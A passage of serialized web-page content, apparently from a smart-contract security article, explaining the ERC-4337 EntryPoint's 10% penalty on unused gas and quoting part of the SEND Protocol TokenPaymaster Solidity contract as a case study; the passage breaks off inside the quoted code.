Gas Costs",{"type":27,"tag":36,"props":110097,"children":110098},{},[110099,110101,110106,110108,110113,110115,110120,110122,110129],{"type":33,"value":110100},"To understand this issue, let's first examine how gas penalties work in the ",{"type":27,"tag":84,"props":110102,"children":110104},{"className":110103},[],[110105],{"type":33,"value":109470},{"type":33,"value":110107},". When a ",{"type":27,"tag":84,"props":110109,"children":110111},{"className":110110},[],[110112],{"type":33,"value":109389},{"type":33,"value":110114}," specifies an execution gas limit higher than what's actually used during execution, the ",{"type":27,"tag":84,"props":110116,"children":110118},{"className":110117},[],[110119],{"type":33,"value":109470},{"type":33,"value":110121}," charges a ",{"type":27,"tag":47,"props":110123,"children":110126},{"href":110124,"rel":110125},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.7/contracts/core/EntryPoint.sol#L718-L728",[51],[110127],{"type":33,"value":110128},"penalty of 10%",{"type":33,"value":110130}," of the unused gas. This penalty is paid to the bundler and is deducted from either the user's deposit (for regular transactions) or the paymaster's deposit (when using a paymaster).",{"type":27,"tag":36,"props":110132,"children":110133},{},[110134],{"type":33,"value":110135},"Now, let's examine a real-world example of how this penalty mechanism could impact paymasters. The SEND Protocol's paymaster implementation provides an instructive case study:",{"type":27,"tag":101,"props":110137,"children":110139},{"className":11758,"code":110138,"language":11757,"meta":7,"style":7},"contract TokenPaymaster is BasePaymaster, UniswapHelper, OracleHelper {\n[...]\n function _validatePaymasterUserOp(PackedUserOperation calldata userOp, bytes32, uint256 requiredPreFund)\n internal\n override\n returns (bytes memory context, uint256 validationResult)\n {\n unchecked {\n uint256 priceMarkup = tokenPaymasterConfig.priceMarkup;\n uint256 baseFee = tokenPaymasterConfig.baseFee;\n uint256 dataLength = userOp.paymasterAndData.length - PAYMASTER_DATA_OFFSET;\n require(dataLength == 0 || dataLength == 32, \"TPM: invalid data length\");\n uint256 maxFeePerGas = userOp.unpackMaxFeePerGas();\n uint256 refundPostopCost = tokenPaymasterConfig.refundPostopCost;\n require(refundPostopCost \u003C userOp.unpackPostOpGasLimit(), \"TPM: postOpGasLimit too low\");\n uint256 preChargeNative = requiredPreFund + (refundPostopCost * maxFeePerGas);\n // note: price is in native-asset-per-token increasing it means dividing it by markup\n uint256 cachedPriceWithMarkup = cachedPrice * DENOM / priceMarkup;\n if (dataLength == 32) {\n uint256 clientSuppliedPrice =\n uint256(bytes32(userOp.paymasterAndData[PAYMASTER_DATA_OFFSET:PAYMASTER_DATA_OFFSET + 32]));\n if (clientSuppliedPrice \u003C cachedPriceWithMarkup) {\n // note: smaller number means 'more native asset per token'\n cachedPriceWithMarkup = clientSuppliedPrice;\n }\n }\n uint256 tokenAmount = weiToToken(preChargeNative, cachedPriceWithMarkup);\n tokenAmount += baseFee;\n SafeERC20.safeTransferFrom(token, userOp.sender, address(this), tokenAmount);\n context = abi.encode(tokenAmount, userOp.sender);\n validationResult =\n _packValidationData(false, uint48(cachedPriceTimestamp + tokenPaymasterConfig.priceMaxAge), 0);\n }\n }\n[...]\n function _postOp(PostOpMode, bytes calldata context, uint256 actualGasCost, uint256 actualUserOpFeePerGas)\n internal\n override\n {\n unchecked {\n uint256 priceMarkup = tokenPaymasterConfig.priceMarkup;\n uint256 baseFee = tokenPaymasterConfig.baseFee;\n (uint256 preCharge, address userOpSender) = abi.decode(context, (uint256, address));\n preCharge -= baseFee; // don't refund the base fee\n uint256 _cachedPrice = updateCachedPrice(false);\n // note: price is in native-asset-per-token increasing it means dividing it by markup\n uint256 cachedPriceWithMarkup = _cachedPrice * DENOM / priceMarkup;\n // Refund tokens based on actual gas cost\n uint256 actualChargeNative = actualGasCost + tokenPaymasterConfig.refundPostopCost * actualUserOpFeePerGas;\n uint256 actualTokenNeeded = weiToToken(actualChargeNative, cachedPriceWithMarkup);\n if (preCharge > actualTokenNeeded) {\n // If initially provided token amount is greater than the actual amount needed, refund the difference\n SafeERC20.safeTransfer(token, userOpSender, preCharge - actualTokenNeeded);\n } else if (preCharge \u003C actualTokenNeeded) {\n // Attempt to cover Paymaster's gas expenses by withdrawing the 'overdraft' from the client\n // If the transfer reverts also revert the 'postOp' to remove the incentive to cheat\n SafeERC20.safeTransferFrom(token, userOpSender, address(this), actualTokenNeeded - preCharge);\n }\n\n if (baseFee > 0) {\n SafeERC20.safeTransfer(token, tokenPaymasterConfig.rewardsPool, baseFee);\n }\n\n emit UserOperationSponsored(userOpSender, actualTokenNeeded, actualGasCost, cachedPriceWithMarkup, baseFee);\n refillEntryPointDeposit(_cachedPrice);\n }\n }\n}\n",[110140],{"type":27,"tag":84,"props":110141,"children":110142},{"__ignoreMap":7},[110143,110187,110194,110251,110259,110267,110309,110316,110328,110350,110371,110401,110452,110482,110503,110541,110580,110597,110636,110660,110677,110720,110742,110759,110776,110783,110790,110816,110833,110868,110899,110911,110958,110965,110972,110979,111046,111053,111060,111067,111078,111097,111116,111180,111203,111236,111251,111286,111294,111333,111358,111379,111387,111414,111441,111449,111457,111499,111506,111513,111537,111553,111560,111567,111585,111598,111605,111612],{"type":27,"tag":207,"props":110144,"children":110145},{"class":209,"line":210},[110146,110150,110155,110160,110165,110169,110174,110178,110183],{"type":27,"tag":207,"props":110147,"children":110148},{"style":214},[110149],{"type":33,"value":97033},{"type":27,"tag":207,"props":110151,"children":110152},{"style":8920},[110153],{"type":33,"value":110154}," TokenPaymaster",{"type":27,"tag":207,"props":110156,"children":110157},{"style":214},[110158],{"type":33,"value":110159}," is",{"type":27,"tag":207,"props":110161,"children":110162},{"style":8920},[110163],{"type":33,"value":110164}," BasePaymaster",{"type":27,"tag":207,"props":110166,"children":110167},{"style":238},[110168],{"type":33,"value":1123},{"type":27,"tag":207,"props":110170,"children":110171},{"style":8920},[110172],{"type":33,"value":110173},"UniswapHelper",{"type":27,"tag":207,"props":110175,"children":110176},{"style":238},[110177],{"type":33,"value":1123},{"type":27,"tag":207,"props":110179,"children":110180},{"style":8920},[110181],{"type":33,"value":110182},"OracleHelper",{"type":27,"tag":207,"props":110184,"children":110185},{"style":238},[110186],{"type":33,"value":384},{"type":27,"tag":207,"props":110188,"children":110189},{"class":209,"line":244},[110190],{"type":27,"tag":207,"props":110191,"children":110192},{"style":238},[110193],{"type":33,"value":17595},{"type":27,"tag":207,"props":110195,"children":110196},{"class":209,"line":270},[110197,110201,110206,110210,110215,110220,110225,110229,110234,110238,110242,110247],{"type":27,"tag":207,"props":110198,"children":110199},{"style":214},[110200],{"type":33,"value":97050},{"type":27,"tag":207,"props":110202,"children":110203},{"style":1335},[110204],{"type":33,"value":110205}," _validatePaymasterUserOp",{"type":27,"tag":207,"props":110207,"children":110208},{"style":238},[110209],{"type":33,"value":1343},{"type":27,"tag":207,"props":110211,"children":110212},{"style":214},[110213],{"type":33,"value":110214},"PackedUserOperation",{"type":27,"tag":207,"props":110216,"children":110217},{"style":214},[110218],{"type":33,"value":110219}," calldata",{"type":27,"tag":207,"props":110221,"children":110222},{"style":220},[110223],{"type":33,"value":110224}," userOp",{"type":27,"tag":207,"props":110226,"children":110227},{"style":238},[110228],{"type":33,"value":1123},{"type":27,"tag":207,"props":110230,"children":110231},{"style":8920},[110232],{"type":33,"value":110233},"bytes32",{"type":27,"tag":207,"props":110235,"children":110236},{"style":238},[110237],{"type":33,"value":1123},{"type":27,"tag":207,"props":110239,"children":110240},{"style":8920},[110241],{"type":33,"value":53410},{"type":27,"tag":207,"props":110243,"children":110244},{"style":220},[110245],{"type":33,"value":110246}," requiredPreFund",{"type":27,"tag":207,"props":110248,"children":110249},{"style":238},[110250],{"type":33,"value":10449},{"type":27,"tag":207,"props":110252,"children":110253},{"class":209,"line":296},[110254],{"type":27,"tag":207,"props":110255,"children":110256},{"style":214},[110257],{"type":33,"value":110258}," internal\n",{"type":27,"tag":207,"props":110260,"children":110261},{"class":209,"line":445},[110262],{"type":27,"tag":207,"props":110263,"children":110264},{"style":214},[110265],{"type":33,"value":110266}," override\n",{"type":27,"tag":207,"props":110268,"children":110269},{"class":209,"line":867},[110270,110275,110279,110283,110288,110292,110296,110300,110305],{"type":27,"tag":207,"props":110271,"children":110272},{"style":376},[110273],{"type":33,"value":110274}," returns",{"type":27,"tag":207,"props":110276,"children":110277},{"style":238},[110278],{"type":33,"value":686},{"type":27,"tag":207,"props":110280,"children":110281},{"style":8920},[110282],{"type":33,"value":91051},{"type":27,"tag":207,"props":110284,"children":110285},{"style":214},[110286],{"type":33,"value":110287}," memory",{"type":27,"tag":207,"props":110289,"children":110290},{"style":220},[110291],{"type":33,"value":83572},{"type":27,"tag":207,"props":110293,"children":110294},{"style":238},[110295],{"type":33,"value":1123},{"type":27,"tag":207,"props":110297,"children":110298},{"style":8920},[110299],{"type":33,"value":53410},{"type":27,"tag":207,"props":110301,"children":110302},{"style":220},[110303],{"type":33,"value":110304}," validationResult",{"type":27,"tag":207,"props":110306,"children":110307},{"style":238},[110308],{"type":33,"value":10449},{"type":27,"tag":207,"props":110310,"children":110311},{"class":209,"line":892},[110312],{"type":27,"tag":207,"props":110313,"children":110314},{"style":238},[110315],{"type":33,"value":36449},{"type":27,"tag":207,"props":110317,"children":110318},{"class":209,"line":1475},[110319,110324],{"type":27,"tag":207,"props":110320,"children":110321},{"style":376},[110322],{"type":33,"value":110323}," unchecked",{"type":27,"tag":207,"props":110325,"children":110326},{"style":238},[110327],{"type":33,"value":384},{"type":27,"tag":207,"props":110329,"children":110330},{"class":209,"line":2065},[110331,110336,110341,110345],{"type":27,"tag":207,"props":110332,"children":110333},{"style":8920},[110334],{"type":33,"value":110335}," uint256",{"type":27,"tag":207,"props":110337,"children":110338},{"style":238},[110339],{"type":33,"value":110340}," priceMarkup ",{"type":27,"tag":207,"props":110342,"children":110343},{"style":226},[110344],{"type":33,"value":10380},{"type":27,"tag":207,"props":110346,"children":110347},{"style":238},[110348],{"type":33,"value":110349}," tokenPaymasterConfig.priceMarkup;\n",{"type":27,"tag":207,"props":110351,"children":110352},{"class":209,"line":2092},[110353,110357,110362,110366],{"type":27,"tag":207,"props":110354,"children":110355},{"style":8920},[110356],{"type":33,"value":110335},{"type":27,"tag":207,"props":110358,"children":110359},{"style":238},[110360],{"type":33,"value":110361}," baseFee ",{"type":27,"tag":207,"props":110363,"children":110364},{"style":226},[110365],{"type":33,"value":10380},{"type":27,"tag":207,"props":110367,"children":110368},{"style":238},[110369],{"type":33,"value":110370}," tokenPaymasterConfig.baseFee;\n",{"type":27,"tag":207,"props":110372,"children":110373},{"class":209,"line":2130},[110374,110378,110383,110387,110392,110396],{"type":27,"tag":207,"props":110375,"children":110376},{"style":8920},[110377],{"type":33,"value":110335},{"type":27,"tag":207,"props":110379,"children":110380},{"style":238},[110381],{"type":33,"value":110382}," dataLength ",{"type":27,"tag":207,"props":110384,"children":110385},{"style":226},[110386],{"type":33,"value":10380},{"type":27,"tag":207,"props":110388,"children":110389},{"style":238},[110390],{"type":33,"value":110391}," userOp.paymasterAndData.length ",{"type":27,"tag":207,"props":110393,"children":110394},{"style":226},[110395],{"type":33,"value":11611},{"type":27,"tag":207,"props":110397,"children":110398},{"style":238},[110399],{"type":33,"value":110400}," PAYMASTER_DATA_OFFSET;\n",{"type":27,"tag":207,"props":110402,"children":110403},{"class":209,"line":2168},[110404,110409,110414,110418,110422,110426,110430,110434,110439,110443,110448],{"type":27,"tag":207,"props":110405,"children":110406},{"style":376},[110407],{"type":33,"value":110408}," require",{"type":27,"tag":207,"props":110410,"children":110411},{"style":238},[110412],{"type":33,"value":110413},"(dataLength ",{"type":27,"tag":207,"props":110415,"children":110416},{"style":226},[110417],{"type":33,"value":15856},{"type":27,"tag":207,"props":110419,"children":110420},{"style":232},[110421],{"type":33,"value":4680},{"type":27,"tag":207,"props":110423,"children":110424},{"style":226},[110425],{"type":33,"value":30971},{"type":27,"tag":207,"props":110427,"children":110428},{"style":238},[110429],{"type":33,"value":110382},{"type":27,"tag":207,"props":110431,"children":110432},{"style":226},[110433],{"type":33,"value":15856},{"type":27,"tag":207,"props":110435,"children":110436},{"style":232},[110437],{"type":33,"value":110438}," 32",{"type":27,"tag":207,"props":110440,"children":110441},{"style":238},[110442],{"type":33,"value":1123},{"type":27,"tag":207,"props":110444,"children":110445},{"style":1325},[110446],{"type":33,"value":110447},"\"TPM: invalid data length\"",{"type":27,"tag":207,"props":110449,"children":110450},{"style":238},[110451],{"type":33,"value":1455},{"type":27,"tag":207,"props":110453,"children":110454},{"class":209,"line":4095},[110455,110459,110464,110468,110473,110478],{"type":27,"tag":207,"props":110456,"children":110457},{"style":8920},[110458],{"type":33,"value":110335},{"type":27,"tag":207,"props":110460,"children":110461},{"style":238},[110462],{"type":33,"value":110463}," maxFeePerGas ",{"type":27,"tag":207,"props":110465,"children":110466},{"style":226},[110467],{"type":33,"value":10380},{"type":27,"tag":207,"props":110469,"children":110470},{"style":238},[110471],{"type":33,"value":110472}," userOp.",{"type":27,"tag":207,"props":110474,"children":110475},{"style":1335},[110476],{"type":33,"value":110477},"unpackMaxFeePerGas",{"type":27,"tag":207,"props":110479,"children":110480},{"style":238},[110481],{"type":33,"value":4301},{"type":27,"tag":207,"props":110483,"children":110484},{"class":209,"line":4103},[110485,110489,110494,110498],{"type":27,"tag":207,"props":110486,"children":110487},{"style":8920},[110488],{"type":33,"value":110335},{"type":27,"tag":207,"props":110490,"children":110491},{"style":238},[110492],{"type":33,"value":110493}," refundPostopCost ",{"type":27,"tag":207,"props":110495,"children":110496},{"style":226},[110497],{"type":33,"value":10380},{"type":27,"tag":207,"props":110499,"children":110500},{"style":238},[110501],{"type":33,"value":110502}," tokenPaymasterConfig.refundPostopCost;\n",{"type":27,"tag":207,"props":110504,"children":110505},{"class":209,"line":4154},[110506,110510,110515,110519,110523,110528,110532,110537],{"type":27,"tag":207,"props":110507,"children":110508},{"style":376},[110509],{"type":33,"value":110408},{"type":27,"tag":207,"props":110511,"children":110512},{"style":238},[110513],{"type":33,"value":110514},"(refundPostopCost ",{"type":27,"tag":207,"props":110516,"children":110517},{"style":226},[110518],{"type":33,"value":9257},{"type":27,"tag":207,"props":110520,"children":110521},{"style":238},[110522],{"type":33,"value":110472},{"type":27,"tag":207,"props":110524,"children":110525},{"style":1335},[110526],{"type":33,"value":110527},"unpackPostOpGasLimit",{"type":27,"tag":207,"props":110529,"children":110530},{"style":238},[110531],{"type":33,"value":25646},{"type":27,"tag":207,"props":110533,"children":110534},{"style":1325},[110535],{"type":33,"value":110536},"\"TPM: postOpGasLimit too low\"",{"type":27,"tag":207,"props":110538,"children":110539},{"style":238},[110540],{"type":33,"value":1455},{"type":27,"tag":207,"props":110542,"children":110543},{"class":209,"line":4203},[110544,110548,110553,110557,110562,110566,110571,110575],{"type":27,"tag":207,"props":110545,"children":110546},{"style":8920},[110547],{"type":33,"value":110335},{"type":27,"tag":207,"props":110549,"children":110550},{"style":238},[110551],{"type":33,"value":110552}," preChargeNative ",{"type":27,"tag":207,"props":110554,"children":110555},{"style":226},[110556],{"type":33,"value":10380},{"type":27,"tag":207,"props":110558,"children":110559},{"style":238},[110560],{"type":33,"value":110561}," requiredPreFund ",{"type":27,"tag":207,"props":110563,"children":110564},{"style":226},[110565],{"type":33,"value":2227},{"type":27,"tag":207,"props":110567,"children":110568},{"style":238},[110569],{"type":33,"value":110570}," (refundPostopCost ",{"type":27,"tag":207,"props":110572,"children":110573},{"style":226},[110574],{"type":33,"value":9286},{"type":27,"tag":207,"props":110576,"children":110577},{"style":238},[110578],{"type":33,"value":110579}," maxFeePerGas);\n",{"type":27,"tag":207,"props":110581,"children":110582},{"class":209,"line":4249},[110583,110588,110592],{"type":27,"tag":207,"props":110584,"children":110585},{"style":4647},[110586],{"type":33,"value":110587}," // ",{"type":27,"tag":207,"props":110589,"children":110590},{"style":214},[110591],{"type":33,"value":73992},{"type":27,"tag":207,"props":110593,"children":110594},{"style":4647},[110595],{"type":33,"value":110596},": price is in native-asset-per-token increasing it means dividing it by markup\n",{"type":27,"tag":207,"props":110598,"children":110599},{"class":209,"line":4290},[110600,110604,110609,110613,110618,110622,110627,110631],{"type":27,"tag":207,"props":110601,"children":110602},{"style":8920},[110603],{"type":33,"value":110335},{"type":27,"tag":207,"props":110605,"children":110606},{"style":238},[110607],{"type":33,"value":110608}," cachedPriceWithMarkup ",{"type":27,"tag":207,"props":110610,"children":110611},{"style":226},[110612],{"type":33,"value":10380},{"type":27,"tag":207,"props":110614,"children":110615},{"style":238},[110616],{"type":33,"value":110617}," cachedPrice ",{"type":27,"tag":207,"props":110619,"children":110620},{"style":226},[110621],{"type":33,"value":9286},{"type":27,"tag":207,"props":110623,"children":110624},{"style":238},[110625],{"type":33,"value":110626}," DENOM ",{"type":27,"tag":207,"props":110628,"children":110629},{"style":226},[110630],{"type":33,"value":980},{"type":27,"tag":207,"props":110632,"children":110633},{"style":238},[110634],{"type":33,"value":110635}," priceMarkup;\n",{"type":27,"tag":207,"props":110637,"children":110638},{"class":209,"line":4304},[110639,110643,110648,110652,110656],{"type":27,"tag":207,"props":110640,"children":110641},{"style":376},[110642],{"type":33,"value":66034},{"type":27,"tag":207,"props":110644,"children":110645},{"style":238},[110646],{"type":33,"value":110647}," (dataLength ",{"type":27,"tag":207,"props":110649,"children":110650},{"style":226},[110651],{"type":33,"value":15856},{"type":27,"tag":207,"props":110653,"children":110654},{"style":232},[110655],{"type":33,"value":110438},{"type":27,"tag":207,"props":110657,"children":110658},{"style":238},[110659],{"type":33,"value":1424},{"type":27,"tag":207,"props":110661,"children":110662},{"class":209,"line":5466},[110663,110668,110673],{"type":27,"tag":207,"props":110664,"children":110665},{"style":8920},[110666],{"type":33,"value":110667}," uint256",{"type":27,"tag":207,"props":110669,"children":110670},{"style":238},[110671],{"type":33,"value":110672}," clientSuppliedPrice ",{"type":27,"tag":207,"props":110674,"children":110675},{"style":226},[110676],{"type":33,"value":21969},{"type":27,"tag":207,"props":110678,"children":110679},{"class":209,"line":5530},[110680,110685,110689,110693,110698,110702,110707,110711,110715],{"type":27,"tag":207,"props":110681,"children":110682},{"style":8920},[110683],{"type":33,"value":110684}," uint256",{"type":27,"tag":207,"props":110686,"children":110687},{"style":238},[110688],{"type":33,"value":1343},{"type":27,"tag":207,"props":110690,"children":110691},{"style":8920},[110692],{"type":33,"value":110233},{"type":27,"tag":207,"props":110694,"children":110695},{"style":238},[110696],{"type":33,"value":110697},"(userOp.paymasterAndData[PAYMASTER_DATA_OFFSET",{"type":27,"tag":207,"props":110699,"children":110700},{"style":226},[110701],{"type":33,"value":736},{"type":27,"tag":207,"props":110703,"children":110704},{"style":238},[110705],{"type":33,"value":110706},"PAYMASTER_DATA_OFFSET ",{"type":27,"tag":207,"props":110708,"children":110709},{"style":226},[110710],{"type":33,"value":2227},{"type":27,"tag":207,"props":110712,"children":110713},{"style":232},[110714],{"type":33,"value":110438},{"type":27,"tag":207,"props":110716,"children":110717},{"style":238},[110718],{"type":33,"value":110719},"]));\n",{"type":27,"tag":207,"props":110721,"children":110722},{"class":209,"line":7900},[110723,110728,110733,110737],{"type":27,"tag":207,"props":110724,"children":110725},{"style":376},[110726],{"type":33,"value":110727}," if",{"type":27,"tag":207,"props":110729,"children":110730},{"style":238},[110731],{"type":33,"value":110732}," (clientSuppliedPrice ",{"type":27,"tag":207,"props":110734,"children":110735},{"style":226},[110736],{"type":33,"value":9257},{"type":27,"tag":207,"props":110738,"children":110739},{"style":238},[110740],{"type":33,"value":110741}," cachedPriceWithMarkup) {\n",{"type":27,"tag":207,"props":110743,"children":110744},{"class":209,"line":7909},[110745,110750,110754],{"type":27,"tag":207,"props":110746,"children":110747},{"style":4647},[110748],{"type":33,"value":110749}," // ",{"type":27,"tag":207,"props":110751,"children":110752},{"style":214},[110753],{"type":33,"value":73992},{"type":27,"tag":207,"props":110755,"children":110756},{"style":4647},[110757],{"type":33,"value":110758},": smaller number means 'more native asset per token'\n",{"type":27,"tag":207,"props":110760,"children":110761},{"class":209,"line":7917},[110762,110767,110771],{"type":27,"tag":207,"props":110763,"children":110764},{"style":238},[110765],{"type":33,"value":110766}," cachedPriceWithMarkup ",{"type":27,"tag":207,"props":110768,"children":110769},{"style":226},[110770],{"type":33,"value":10380},{"type":27,"tag":207,"props":110772,"children":110773},{"style":238},[110774],{"type":33,"value":110775}," clientSuppliedPrice;\n",{"type":27,"tag":207,"props":110777,"children":110778},{"class":209,"line":7926},[110779],{"type":27,"tag":207,"props":110780,"children":110781},{"style":238},[110782],{"type":33,"value":78304},{"type":27,"tag":207,"props":110784,"children":110785},{"class":209,"line":7934},[110786],{"type":27,"tag":207,"props":110787,"children":110788},{"style":238},[110789],{"type":33,"value":66118},{"type":27,"tag":207,"props":110791,"children":110792},{"class":209,"line":7943},[110793,110797,110802,110806,110811],{"type":27,"tag":207,"props":110794,"children":110795},{"style":8920},[110796],{"type":33,"value":110335},{"type":27,"tag":207,"props":110798,"children":110799},{"style":238},[110800],{"type":33,"value":110801}," tokenAmount ",{"type":27,"tag":207,"props":110803,"children":110804},{"style":226},[110805],{"type":33,"value":10380},{"type":27,"tag":207,"props":110807,"children":110808},{"style":1335},[110809],{"type":33,"value":110810}," weiToToken",{"type":27,"tag":207,"props":110812,"children":110813},{"style":238},[110814],{"type":33,"value":110815},"(preChargeNative, cachedPriceWithMarkup);\n",{"type":27,"tag":207,"props":110817,"children":110818},{"class":209,"line":7952},[110819,110824,110828],{"type":27,"tag":207,"props":110820,"children":110821},{"style":238},[110822],{"type":33,"value":110823}," tokenAmount ",{"type":27,"tag":207,"props":110825,"children":110826},{"style":226},[110827],{"type":33,"value":75671},{"type":27,"tag":207,"props":110829,"children":110830},{"style":238},[110831],{"type":33,"value":110832}," baseFee;\n",{"type":27,"tag":207,"props":110834,"children":110835},{"class":209,"line":7961},[110836,110841,110846,110851,110855,110859,110863],{"type":27,"tag":207,"props":110837,"children":110838},{"style":238},[110839],{"type":33,"value":110840}," SafeERC20.",{"type":27,"tag":207,"props":110842,"children":110843},{"style":1335},[110844],{"type":33,"value":110845},"safeTransferFrom",{"type":27,"tag":207,"props":110847,"children":110848},{"style":238},[110849],{"type":33,"value":110850},"(token, userOp.sender, ",{"type":27,"tag":207,"props":110852,"children":110853},{"style":8920},[110854],{"type":33,"value":39898},{"type":27,"tag":207,"props":110856,"children":110857},{"style":238},[110858],{"type":33,"value":1343},{"type":27,"tag":207,"props":110860,"children":110861},{"style":214},[110862],{"type":33,"value":24964},{"type":27,"tag":207,"props":110864,"children":110865},{"style":238},[110866],{"type":33,"value":110867},"), tokenAmount);\n",{"type":27,"tag":207,"props":110869,"children":110870},{"class":209,"line":7969},[110871,110876,110880,110885,110889,110894],{"type":27,"tag":207,"props":110872,"children":110873},{"style":238},[110874],{"type":33,"value":110875}," context ",{"type":27,"tag":207,"props":110877,"children":110878},{"style":226},[110879],{"type":33,"value":10380},{"type":27,"tag":207,"props":110881,"children":110882},{"style":214},[110883],{"type":33,"value":110884}," abi",{"type":27,"tag":207,"props":110886,"children":110887},{"style":238},[110888],{"type":33,"value":1041},{"type":27,"tag":207,"props":110890,"children":110891},{"style":1335},[110892],{"type":33,"value":110893},"encode",{"type":27,"tag":207,"props":110895,"children":110896},{"style":238},[110897],{"type":33,"value":110898},"(tokenAmount, userOp.sender);\n",{"type":27,"tag":207,"props":110900,"children":110901},{"class":209,"line":7978},[110902,110907],{"type":27,"tag":207,"props":110903,"children":110904},{"style":238},[110905],{"type":33,"value":110906}," validationResult ",{"type":27,"tag":207,"props":110908,"children":110909},{"style":226},[110910],{"type":33,"value":21969},{"type":27,"tag":207,"props":110912,"children":110913},{"class":209,"line":7987},[110914,110919,110923,110927,110931,110936,110941,110945,110950,110954],{"type":27,"tag":207,"props":110915,"children":110916},{"style":1335},[110917],{"type":33,"value":110918}," _packValidationData",{"type":27,"tag":207,"props":110920,"children":110921},{"style":238},[110922],{"type":33,"value":1343},{"type":27,"tag":207,"props":110924,"children":110925},{"style":214},[110926],{"type":33,"value":15456},{"type":27,"tag":207,"props":110928,"children":110929},{"style":238},[110930],{"type":33,"value":1123},{"type":27,"tag":207,"props":110932,"children":110933},{"style":8920},[110934],{"type":33,"value":110935},"uint48",{"type":27,"tag":207,"props":110937,"children":110938},{"style":238},[110939],{"type":33,"value":110940},"(cachedPriceTimestamp ",{"type":27,"tag":207,"props":110942,"children":110943},{"style":226},[110944],{"type":33,"value":2227},{"type":27,"tag":207,"props":110946,"children":110947},{"style":238},[110948],{"type":33,"value":110949}," tokenPaymasterConfig.priceMaxAge), ",{"type":27,"tag":207,"props":110951,"children":110952},{"style":232},[110953],{"type":33,"value":1660},{"type":27,"tag":207,"props":110955,"children":110956},{"style":238},[110957],{"type":33,"value":1455},{"type":27,"tag":207,"props":110959,"children":110960},{"class":209,"line":7996},[110961],{"type":27,"tag":207,"props":110962,"children":110963},{"style":238},[110964],{"type":33,"value":10637},{"type":27,"tag":207,"props":110966,"children":110967},{"class":209,"line":8005},[110968],{"type":27,"tag":207,"props":110969,"children":110970},{"style":238},[110971],{"type":33,"value":10645},{"type":27,"tag":207,"props":110973,"children":110974},{"class":209,"line":8013},[110975],{"type":27,"tag":207,"props":110976,"children":110977},{"style":238},[110978],{"type":33,"value":17595},{"type":27,"tag":207,"props":110980,"children":110981},{"class":209,"line":8021},[110982,110986,110991,110995,111000,111004,111008,111012,111016,111020,111024,111029,111033,111037,111042],{"type":27,"tag":207,"props":110983,"children":110984},{"style":214},[110985],{"type":33,"value":97050},{"type":27,"tag":207,"props":110987,"children":110988},{"style":1335},[110989],{"type":33,"value":110990}," _postOp",{"type":27,"tag":207,"props":110992,"children":110993},{"style":238},[110994],{"type":33,"value":1343},{"type":27,"tag":207,"props":110996,"children":110997},{"style":214},[110998],{"type":33,"value":110999},"PostOpMode",{"type":27,"tag":207,"props":111001,"children":111002},{"style":238},[111003],{"type":33,"value":1123},{"type":27,"tag":207,"props":111005,"children":111006},{"style":8920},[111007],{"type":33,"value":91051},{"type":27,"tag":207,"props":111009,"children":111010},{"style":214},[111011],{"type":33,"value":110219},{"type":27,"tag":207,"props":111013,"children":111014},{"style":220},[111015],{"type":33,"value":83572},{"type":27,"tag":207,"props":111017,"children":111018},{"style":238},[111019],{"type":33,"value":1123},{"type":27,"tag":207,"props":111021,"children":111022},{"style":8920},[111023],{"type":33,"value":53410},{"type":27,"tag":207,"props":111025,"children":111026},{"style":220},[111027],{"type":33,"value":111028}," actualGasCost",{"type":27,"tag":207,"props":111030,"children":111031},{"style":238},[111032],{"type":33,"value":1123},{"type":27,"tag":207,"props":111034,"children":111035},{"style":8920},[111036],{"type":33,"value":53410},{"type":27,"tag":207,"props":111038,"children":111039},{"style":220},[111040],{"type":33,"value":111041}," actualUserOpFeePerGas",{"type":27,"tag":207,"props":111043,"children":111044},{"style":238},[111045],{"type":33,"value":10449},{"type":27,"tag":207,"props":111047,"children":111048},{"class":209,"line":8029},[111049],{"type":27,"tag":207,"props":111050,"children":111051},{"style":214},[111052],{"type":33,"value":110258},{"type":27,"tag":207,"props":111054,"children":111055},{"class":209,"line":8037},[111056],{"type":27,"tag":207,"props":111057,"children":111058},{"style":214},[111059],{"type":33,"value":110266},{"type":27,"tag":207,"props":111061,"children":111062},{"class":209,"line":8046},[111063],{"type":27,"tag":207,"props":111064,"children":111065},{"style":238},[111066],{"type":33,"value":36449},{"type":27,"tag":207,"props":111068,"children":111069},{"class":209,"line":8055},[111070,111074],{"type":27,"tag":207,"props":111071,"children":111072},{"style":376},[111073],{"type":33,"value":110323},{"type":27,"tag":207,"props":111075,"children":111076},{"style":238},[111077],{"type":33,"value":384},{"type":27,"tag":207,"props":111079,"children":111080},{"class":209,"line":8064},[111081,111085,111089,111093],{"type":27,"tag":207,"props":111082,"children":111083},{"style":8920},[111084],{"type":33,"value":110335},{"type":27,"tag":207,"props":111086,"children":111087},{"style":238},[111088],{"type":33,"value":110340},{"type":27,"tag":207,"props":111090,"children":111091},{"style":226},[111092],{"type":33,"value":10380},{"type":27,"tag":207,"props":111094,"children":111095},{"style":238},[111096],{"type":33,"value":110349},{"type":27,"tag":207,"props":111098,"children":111099},{"class":209,"line":8072},[111100,111104,111108,111112],{"type":27,"tag":207,"props":111101,"children":111102},{"style":8920},[111103],{"type":33,"value":110335},{"type":27,"tag":207,"props":111105,"children":111106},{"style":238},[111107],{"type":33,"value":110361},{"type":27,"tag":207,"props":111109,"children":111110},{"style":226},[111111],{"type":33,"value":10380},{"type":27,"tag":207,"props":111113,"children":111114},{"style":238},[111115],{"type":33,"value":110370},{"type":27,"tag":207,"props":111117,"children":111118},{"class":209,"line":8081},[111119,111124,111128,111133,111137,111142,111146,111150,111154,111159,111164,111168,111172,111176],{"type":27,"tag":207,"props":111120,"children":111121},{"style":238},[111122],{"type":33,"value":111123}," (",{"type":27,"tag":207,"props":111125,"children":111126},{"style":8920},[111127],{"type":33,"value":53410},{"type":27,"tag":207,"props":111129,"children":111130},{"style":238},[111131],{"type":33,"value":111132}," preCharge, ",{"type":27,"tag":207,"props":111134,"children":111135},{"style":8920},[111136],{"type":33,"value":39898},{"type":27,"tag":207,"props":111138,"children":111139},{"style":238},[111140],{"type":33,"value":111141}," userOpSender) ",{"type":27,"tag":207,"props":111143,"children":111144},{"style":226},[111145],{"type":33,"value":10380},{"type":27,"tag":207,"props":111147,"children":111148},{"style":214},[111149],{"type":33,"value":110884},{"type":27,"tag":207,"props":111151,"children":111152},{"style":238},[111153],{"type":33,"value":1041},{"type":27,"tag":207,"props":111155,"children":111156},{"style":1335},[111157],{"type":33,"value":111158},"decode",{"type":27,"tag":207,"props":111160,"children":111161},{"style":238},[111162],{"type":33,"value":111163},"(context, 